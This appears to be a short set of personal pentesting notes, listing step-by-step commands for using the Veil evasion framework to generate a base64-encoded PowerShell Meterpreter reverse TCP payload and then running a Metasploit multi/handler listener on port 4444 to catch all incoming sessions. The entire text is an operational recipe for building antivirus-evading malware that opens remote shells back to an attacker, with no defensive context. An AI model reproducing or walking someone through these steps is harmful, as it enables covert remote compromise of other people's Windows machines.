sudo veil
use Evasion
list ..see all the payloads
<tab> <tab> ..view options
info powershell/meterpreter/rev_tcp.py
use powershell/meterpreter/rev_tcp.py
set LHOST 10.x.x.x (tab complete)
generate ..give it a name: veil
Created:
/var/lib/veil/output/source/veil.bat ..base64 encoded
/var/lib/veil/output/handlers/veil.rc ..For MSF
Metasploit Scripting
msfconsole -r /var/lib/veil/output/handlers/veil.rc
jobs ..see that it is running/waiting
Autoloaded this:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.x.x.x
set LPORT 4444
set ExitOnSession false ..catch all sessions!!
exploit -j